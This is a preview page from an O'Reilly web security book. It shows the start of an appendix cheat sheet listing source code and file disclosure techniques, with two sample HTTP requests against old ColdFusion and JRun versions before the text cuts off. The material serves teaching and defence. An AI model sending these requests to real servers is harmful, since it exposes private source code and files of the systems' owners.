O'Reilly logo

Web Hacking: Attacks and Defense by Shreeraj Shah, Saumil Shah, Stuart McClure

Stay ahead with the world's most comprehensive technology and business learning platform.

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, tutorials, and more.

Start Free Trial

No credit card required

Appendix D. Source Code, File, and Directory Disclosure Cheat Sheet

This appendix contains a list of all the major source code disclosure techniques discovered over the years. Many of them are specific to particular bugs in particular versions of software. Others are generic across platforms and have been known to reappear contrary to what the vendors say.

Table D-1. Source Code, File, and Directory Disclosure Cheat Sheet

Vulnerable Application HTTP Request Vulnerability Information
Allaire ColdFusion GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<relative path to CFM file> HTTP/1.0 http://www.securityfocus.com/bid/115
Allaire JRun Alternative Data Stream GET /file.jsp::$DATA HTTP/1.0 http://www.securityfocus.com/bid/3664
Allaire ...

With Safari, you learn the way you learn best. Get unlimited access to videos, live online training, learning paths, books, interactive tutorials, and more.

Start Free Trial

No credit card required